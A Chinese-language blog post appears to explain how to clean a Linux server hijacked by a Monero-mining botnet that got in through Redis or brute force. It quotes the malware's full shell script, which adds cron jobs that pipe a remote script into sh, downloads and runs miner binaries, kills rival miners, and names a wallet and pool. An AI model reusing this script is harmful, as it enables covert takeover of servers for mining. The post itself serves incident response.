伺服器LIUNX之如何解決礦機問題

點進來的基本都是遇到liunx變礦機的小伙伴吧(cpu運載300%) 卡的連終端都很難打開
開下來之後提示 大意是, 到xxx網站給錢了事, 不過基本這個網站基本也上不去, 要麼是暴力破解, 要麼是通過 redis 6379埠 詳情瞭解redis安全漏洞

遇到這種問題毫無疑問:

• 先要把突然出現的亂七八糟的占cpu過高的進程kill -stop pid 暫停掉, 不要嘗試直接kill -9 pid
• cd /etc/cron 查看定時任務 如果在/var/spool/cron這裡面也看下
• 非法的定時任務 內容大概是這樣的
  */5 * * * * curl -fsSL http://www.hacker.com/ltc/minerd/pm.sh | sh
  意思很明確了, 前面的*/5 * * * * 大家很眼熟吧
  curl 是liunx上模擬 瀏覽器請求的命令 -fsSl 大概意思就是啥都不顯示, 你看到下載信息 | sh 下載後運行
  來看下腳本內容

• export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
  
  echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0223 | sh" > /var/spool/cron/root
  mkdir -p /var/spool/cron/crontabs
  echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0223 | sh" > /var/spool/cron/crontabs/root
  
  if [ ! -f "/tmp/ddg.223" ]; then
      curl -fsSL http://www.haveabitchin.com/ddg.$(uname -m) -o /tmp/ddg.223
  fi
  chmod +x /tmp/ddg.223 && /tmp/ddg.223
  
  CleanTail()
  {
      ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9
      ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
      ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
      ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9
      ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9
      ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
      ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
  }
  
  DoYam()
  {
      if [ ! -f "/tmp/AnXqV.yam" ]; then
          curl -fsSL http://www.haveabitchin.com/yam -o /tmp/AnXqV.yam
      fi
      chmod +x /tmp/AnXqV.yam
      /tmp/AnXqV.yam -c x -M stratum+tcp://44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM:[email protected]:443/xmr
  }
  
  DoMiner()
  {
      if [ ! -f "/tmp/AnXqV" ]; then
          curl -fsSL http://www.haveabitchin.com/minerd -o /tmp/AnXqV
      fi
      chmod +x /tmp/AnXqV
      /tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM -p x
  }
  
  DoMinerNoAes()
  {
      if [ ! -f "/tmp/AnXqV.noaes" ]; then
          curl -fsSL http://www.haveabitchin.com/minerd.noaes -o /tmp/AnXqV.noaes
      fi
      chmod +x /tmp/AnXqV.noaes
      /tmp/AnXqV.noaes -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM -p x
  }
  
  ps auxf|grep -v grep|grep "4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC"|awk '{print $2}'|xargs kill -9
  ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"|awk '{print $2}'|xargs kill -9
  ps auxf|grep -v grep|grep "AnXqV" || DoMiner
  ps auxf|grep -v grep|grep "AnXqV" || DoYam
  ps auxf|grep -v grep|grep "AnXqV" || DoMinerNoAes

   

• 最後 到 /tmp/中刪除所有的文件 完全沒關係 記得用ll -a 看下隱藏的文件, 也要刪掉

多多瞭解沒錯的